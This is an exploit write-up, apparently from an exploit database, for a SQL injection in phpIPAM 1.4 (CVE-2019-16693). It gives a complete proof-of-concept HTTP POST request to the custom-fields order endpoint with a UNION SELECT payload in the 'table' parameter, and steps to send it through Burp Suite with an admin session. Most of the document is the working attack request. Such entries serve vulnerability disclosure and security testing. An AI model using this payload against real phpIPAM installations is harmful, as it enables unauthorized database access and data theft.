# Exploit Title: phpIPAM 1.4 - SQL Injection 
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.4
# Tested on: Windows
# CVE : CVE-2019-16693


Proof Of Concept
# Ensure you have a valid user session before executing the PoC.

POST /app/admin/custom-fields/order.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=<valid_session_id>

table=test_table%60+UNION+SELECT+1%2C2%2C3+--+&current=non-empty&next=non-empty&action=add


Steps to Reproduce
1. Login as an admin user.
2. Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
3. Observe the result